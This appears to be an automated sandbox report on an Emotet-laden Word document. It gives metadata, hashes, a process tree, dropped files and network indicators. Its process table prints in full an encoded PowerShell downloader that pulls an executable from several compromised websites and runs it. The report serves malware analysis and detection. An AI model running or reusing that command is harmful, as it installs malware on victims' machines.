File name: | Notice_10092019W_27087.doc |
Full analysis: | https://app.any.run/tasks/1986572c-0256-4ce2-b1b4-3beb6822216b |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 16:59:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Generic, Subject: payment, Author: Cecelia Reynolds, Keywords: monitor, Comments: aggregate, Template: Normal.dotm, Last Saved By: Milton Bayer, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 14:30:00 2019, Last Saved Time/Date: Wed Oct 9 14:30:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0 |
MD5: | 9BF20E08260A83652897CDF698DC1784 |
SHA1: | B06BFDB8D6E19F3B63358281636C448CA16AC881 |
SHA256: | 369E2C3BAD72B46749B3FC97B4EF1B84FA6437D3D099CD8784D13BA50E7AD3EB |
SSDEEP: | 6144:fsJdGk8arLkI07NSU4jJnUATfDuNcFQrQ7/4pm:fsJdGk88X07NSU4VVPuNcFXQpm |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Mitchell |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 202 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Boyer, Schoen and Kessler |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 173 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:09 13:30:00 |
CreateDate: | 2019:10:09 13:30:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Milton Bayer |
Template: | Normal.dotm |
Comments: | aggregate |
Keywords: | monitor |
Author: | Cecelia Reynolds |
Subject: | payment |
Title: | Generic |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2932 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Notice_10092019W_27087.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2788 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGMAOQAwADAAMAAwADcAYgAwADYAPQAnAHgAMAB4ADgAMgA4AGIAMgAwAHgAMAAnADsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAIAA9ACAAJwA5ADkANgAnADsAJAB4ADIAOAAzADQAMAAzADQAMQA4ADEAPQAnAGIANQA0ADUANAAzAGIAOQB4ADAANAAnADsAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAKwAnAC4AZQB4AGUAJwA7ACQAYwAwADAAYgAwADAANAA5ADAAMwA1ADYAPQAnAGMAMAAwADMANQA1ADYANwAwADMANgAnADsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABJAEUAbgB0ADsAJAB4ADUANgAzADUAMABjADAAMAA0ADAAMAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGIAcgBpAGQAYQBsAG0AZQBoAG4AZABpAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAGwAbAB2AHEAYQA2AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AbwBzAGgAdQBuAHYAaQByAGcAaQBuAGgAYQBpAHIAYwBvAC4AYwBvAG0ALwBjAG8AbQBwAGEAdABpAGIAaQBsAGkAdAB5AC8AeQBuADgAZgBqADAAMAA0ADEAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AGkAcwBhAHQAbABhAGcAcgBhAG4AagBhAC4AYwBvAG0ALwA3AGIAaQBlAGMAMwAvAHUAbQA5AGoAMwA2ADAANgAvAEAAaAB0AHQAcAA6AC8ALwAzAGQAcwBoAGEAcgBwAGUAZABnAGUALgBjAG8AbQAvAGQAYgBjAG8AbgBuAGUAYwB0AC8AeAAzADgANgA5ADEANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAaABlAGMAcgBlAGUAawBwAHYALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAHkAbwB1AGQALwBpAGoAMQAvACcALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABiADMAYwAyADEANAB4AHgANgA1AGIAMAA9ACcAYgA4AGMAMAAwADEAMQAzADAAMQA4ADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHgANAAwADAANwA2ADQAMwAzADAAMwAgAGkAbgAgACQAeAA1ADYAMwA1ADAAYwAwADAANAAwADAAKQB7AHQAcgB5AHsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AC4AIgBkAGAATwBXAG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJAB4ADQAMAAwADcANgA0ADMAMwAwADMALAAgACQAeAAyADkANgAzADAANgBiADMANAAxADkAMAApADsAJAB4AHgANwA2ADQAMwB4ADMAOAB4ADIAYgBjAD0AJwB4ADgANgAxAHgAYgAwADgANAA4ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwACkALgAiAEwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADkAMwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAcgB0ACIAKAAkAHgAMgA5ADYAMwAwADYAYgAzADQAMQA5ADAAKQA7ACQAYwA4ADIAMAAxADAANgAwADYANQAwADMAPQAnAHgAOAAwAGIAYgAxADcANwBiADkANAA5ADMAJwA7AGIAcgBlAGEAawA7ACQAYwBiADAAeAAwADkANAB4AGIAMAAzAD0AJwB4AGIAMwA5AHgAMAA2ADAAMABjADMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADYANwA2ADUAYwA5ADcAMwAwADIAPQAnAGMAOAA5AGMAOQA2AGMANQB4ADQAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4DDE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3W4FB078L0JG9IXJNMHF.temp | — | |
MD5:— | SHA256:— | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2D3FFF0683321FFC7419E2D26CF93CE5 | SHA256:F19865A72DB1BF3207789E64924ACC0257D33AB4E9BD7F9C4694E412DA672D27 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62031837.wmf | wmf | |
MD5:1E193B176208F967C63DBE209313AF71 | SHA256:972F907404968CC7D3787D2126E3C6B72E82C66C4F976CC6930A4CDC9256FC36 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:846065ECD238DF3F17EAD3F774E3EF4C | SHA256:1FCB331B53CF8C824EEED3FEE3C6605F43989EDFF4A368562EF9F51B4FD6565A | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10658EFF.wmf | wmf | |
MD5:5669B11E6A7BED119B704C986F36EEAF | SHA256:CD6BC663C82EE4A3E01EC37CCEEF0184B42B08D25C445BD5AE92F273E53E8260 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Notice_10092019W_27087.doc.LNK | lnk | |
MD5:11C4D96E7A290044EE2EC794CF3B765C | SHA256:2E6C8500BB3F79406AC7FEE4F3FA7F1F6936E73648595C70C17E9F4C1725721C | |||
2788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:C911F7DBBF8956A476A7162FD7A88B15 | SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1BAF322.wmf | wmf | |
MD5:45953BCD8BF927C7725A835947B19421 | SHA256:04A275E0AE71F71BEC01DE69BE08A53E985640800FD40E90870F41F3D07C7BAF | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5AB0F09.wmf | wmf | |
MD5:6E2E4D94265AD504DDA0F176EDD008EA | SHA256:97BC7A7FD0EB948F698A19D7B88D3DD5E21A1F70AA194261A1175ADE36F1F99E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2788 | powershell.exe | GET | 404 | 45.56.112.8:80 | http://www.oshunvirginhairco.com/compatibility/yn8fj00419/ | US | xml | 345 b | suspicious |
2788 | powershell.exe | GET | 404 | 181.88.192.52:80 | http://wisatlagranja.com/7biec3/um9j3606/ | AR | xml | 345 b | unknown |
2788 | powershell.exe | GET | 404 | 107.180.25.163:80 | http://www.thecreekpv.com/function.youd/ij1/ | US | xml | 345 b | malicious |
2788 | powershell.exe | GET | 404 | 148.72.92.137:80 | http://3dsharpedge.com/dbconnect/x386915/ | US | xml | 345 b | unknown |
2788 | powershell.exe | GET | 404 | 103.129.99.179:80 | http://www.bridalmehndistudio.com/wp-admin/ellvqa6/ | unknown | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2788 | powershell.exe | 45.56.112.8:80 | www.oshunvirginhairco.com | Linode, LLC | US | suspicious |
2788 | powershell.exe | 181.88.192.52:80 | wisatlagranja.com | Telecom Argentina S.A. | AR | unknown |
2788 | powershell.exe | 103.129.99.179:80 | www.bridalmehndistudio.com | — | — | suspicious |
2788 | powershell.exe | 107.180.25.163:80 | www.thecreekpv.com | GoDaddy.com, LLC | US | suspicious |
2788 | powershell.exe | 148.72.92.137:80 | 3dsharpedge.com | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.bridalmehndistudio.com |
| suspicious |
www.oshunvirginhairco.com |
| suspicious |
wisatlagranja.com |
| unknown |
3dsharpedge.com |
| unknown |
www.thecreekpv.com |
| malicious |